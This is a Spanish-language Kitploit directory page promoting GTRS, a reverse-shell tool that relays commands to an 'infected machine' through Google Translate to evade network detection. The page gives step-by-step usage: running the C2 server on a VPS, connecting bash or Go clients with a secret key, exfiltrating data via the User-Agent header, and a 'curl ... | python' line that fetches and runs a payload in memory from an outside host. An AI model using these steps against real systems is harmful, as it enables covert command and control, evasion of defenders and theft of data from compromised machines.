Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
GTRS — GTRS - Reverse Shell del Traductor de Google | Kitploit
Herramientas/GitHubGitHub/mthbernardes/gtrs
Evasión de IDS/IPSExfiltración de DatosComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubmthbernardes/gtrs

GTRS

GTRS - Reverse Shell del Traductor de Google

Ver Repositorio
624994hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

GTRS - Shell Inversa de Google Translator

Esta herramienta utiliza Google Translator como proxy para enviar comandos arbitrarios a una máquina infectada.

root@kitploit:~
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2] 

Configuración del Entorno

Primero necesitas un VPS y un dominio; para el dominio puedes obtener uno gratuito en Freenom.

Servidor

Ejecuta server.py en tu VPS

root@kitploit:~
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062

Te proporcionará una clave secreta que se usará en el cliente.

Cliente bash

Ejecuta el cliente en un equipo con acceso a Google Translator, proporcionando el dominio y la clave secreta generada por el servidor.

root@kitploit:~
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062

Ahora tienes un shell interactivo usando archivos named pipe, SÍ puedes usar cd para moverte entre directorios.

Descargar herramienta

Cliente Go

Primero debes descargar el binario o compilarlo, luego el proceso es igual al del cliente bash,

root@kitploit:~
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062

Con este cliente tienes la capacidad de ejecutarlo en Linux, Mac y Windows, pero el cliente aún no tiene un shell interactivo.

Ejecución ELF en memoria (Solo Linux)

Después de leer este blogpost, hice una adaptación simple para ejecutar GTRS en memoria, solo edita el host y la clave en el script inmemory-linux.py, luego alójalo en un servidor y usa curl.

root@kitploit:~
curl https://yourserver.ml/inmemory-linux.py | python

O puedes alojar el script usando el enfoque de youtube.

Poc

CODE_IS_CHEAP_SHOW_ME_THE_DEMO

Problemas conocidos

  • Google Translate no reenvía datos POST, por lo que hay un límite en la cantidad de datos que tu servidor puede recibir; por ejemplo, probablemente no podrás leer un archivo grande como .bashrc. Problema solucionado usando el encabezado User-Agent para enviar datos.
  • El script del cliente funciona en Mac y Linux, pero en Linux necesitas instalar xmllint que se encuentra en libxml2-utils Problema solucionado, ahora el cliente también está escrito en Go.
  • No es un problema, pero simplemente no sé si hay un límite de tasa en Google Translator.